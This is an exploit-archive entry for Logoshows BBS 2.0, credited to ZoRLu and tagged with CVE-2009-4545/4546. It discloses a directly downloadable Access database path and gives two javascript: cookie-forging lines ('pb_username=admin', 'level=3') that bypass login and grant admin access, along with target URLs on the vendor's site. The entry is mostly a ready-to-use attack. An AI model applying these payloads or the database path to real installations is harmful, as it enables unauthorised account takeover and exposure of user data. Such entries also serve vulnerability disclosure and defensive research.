logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling



EKU-ID: 17173 CVE: OSVDB-61547;CVE-2009-4546;OSVDB-61546;CVE-2009-4545 OSVDB-ID:
Author: ZoRLu Published: 2009-08-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Logoshows BBS 2.0 DD

ZoRLu

yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info

ref: http://www.milw0rm.com/exploits/9389

vuln:

http://www.logoshows.com/bbs/database/globepersonnel.mdb

Logoshows BBS 2.0 ICH

yildirimordulari.com - z0rlu.blogspot.com - turkguvenligi.info

ref: http://www.milw0rm.com/exploits/9389

demo:

http://www.logoshows.com/bbs/globepersonnel_login.asp

exploit:

javascript:document.cookie = "pb%5Fusername=admin; path=/";

exploit:

javascript:document.cookie = "level=3; path=/";

after you go here:


after go here:

http://www.logoshows.com/bbs/globepersonnel_reply.asp?id=6&topic=6&recordnum=0

thanks: str0ke and all friends

# milw0rm.com [2009-08-07]